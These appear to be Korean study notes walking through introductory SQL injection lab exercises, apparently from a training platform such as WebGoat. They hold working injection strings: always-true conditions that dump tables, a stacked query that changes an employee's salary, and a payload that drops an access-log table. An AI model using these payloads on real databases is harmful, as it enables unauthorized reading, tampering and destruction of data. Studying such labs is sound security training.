SQL Injection (intro)

SQL Injection 

- DBMS를 공격

---

DML

SELECT [열] FROM [테이블] WHERE [조건]

select department from employees where userid=96134

---

UPDATE [테이블] SET [열] = '변경할값' WHERE [조건]

update employees set department = 'Sales' where userid = 89762

---

DDL

alter table UserTbl add Birth varchar(6) NULL

alter table employees add phone varchar(20)

---

DCL

GRANT [객체권한명] (컬럼)
ON [객체명]
TO { 유저명 | 롤명 | PUBLC} [WITH GRANT OPTION]

grant select on grant_rights to unauthorized_user

---

SELECT * FROM user_data WHERE first_name = 'John' AND last_name = '____________________'

                                                                    Smith' or '1' = '1

---

모든 데이타 검색

1번 필드는 숫자만 가능

" 필터링

 

성공

성공

---

"SELECT * FROM employees WHERE last_name = '" + name + "' AND auth_tan = '" + auth_tan + "'";
                                                Smith                     1' or 1=1 --
                                                             /       False      True        /
                                                                          True
                                                                          
                                                                          
                                                
"SELECT * FROM employees WHERE last_name = ' Smith ' AND auth_tan = '1' or 1=1 -- '";

---

"SELECT * FROM employees WHERE last_name = '" + name + "' AND auth_tan = '" + auth_tan + "'";
                                                Smith

// 뒷부분

auth_tan = '" + ____________________________________________________________________ +"'";
                3SL99A'; update employees set SALARY = 100000 where userid = '37648

auth_tan = '3SL99A'; update employees set SALARY = 100000 where userid = '37648';

---

1'; drop table access_log --
기존 검색 막고
    drop 구문 넣고
                          뒤에 주석처리